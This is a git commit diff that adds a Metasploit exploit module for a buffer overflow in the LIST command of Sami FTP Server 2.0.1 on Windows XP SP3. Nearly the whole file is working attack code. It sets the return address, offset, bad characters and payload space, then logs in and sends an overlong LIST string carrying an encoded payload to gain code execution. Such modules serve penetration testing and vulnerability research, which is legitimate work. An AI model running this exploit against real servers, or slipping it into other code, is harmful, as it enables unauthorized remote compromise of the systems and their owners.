Merge branch 'master' of https://github.com/dougsko/metasploit-framework

modules/exploits/windows/ftp/sami_ftpd_list.rb

@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#	http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+	Rank = AverageRanking
+
+	include Msf::Exploit::Remote::Ftp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'			 => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
+			'Description'	 => %q{
+					A buffer overflow is triggered when a long LIST
+				command is sent to the server and the user views the Log tab.
+			},
+			'Platform'		 => 'Windows',
+			'Author'		 =>
+				[
+					'superkojiman', # Original exploit
+					'Doug Prostko <dougtko[at]gmail.com>' # MSF module
+				],
+			'License'		 => MSF_LICENSE,
+			'References'	 =>
+				[
+					[ 'OSVDB', '90815'],
+					[ 'EDB', '24557'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+					'target' => 0
+				},
+			'Privileged'	 => false,
+			'Payload'		 =>
+				{
+					'Space'    => 900,
+					'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
+					'StackAdjustment' => -3500,
+				},
+			'Targets'		 =>
+				[
+					[
+						'Windows XP English SP3',
+						{
+							'Platform' => 'win',
+							'Ret' => 0x10028283,
+							'Offset'   => 219,
+						},
+					],
+				],
+			'DisclosureDate' => 'Feb 27 2013'))
+	end
+
+	def exploit
+		connect
+
+		print_status("Trying target #{target.name}...")
+
+		buf = rand_text_english(target['Offset'], payload_badchars)
+		buf << [ target['Ret'] ].pack('V')
+		buf << payload.encoded
+
+		send_cmd( ['USER', datastore['FTPUSER']] , false )
+		send_cmd( ['PASS', datastore['FTPPASS']], false )
+		send_cmd( ['LIST', buf], false )
+
+		handler
+		disconnect
+	end
+
+end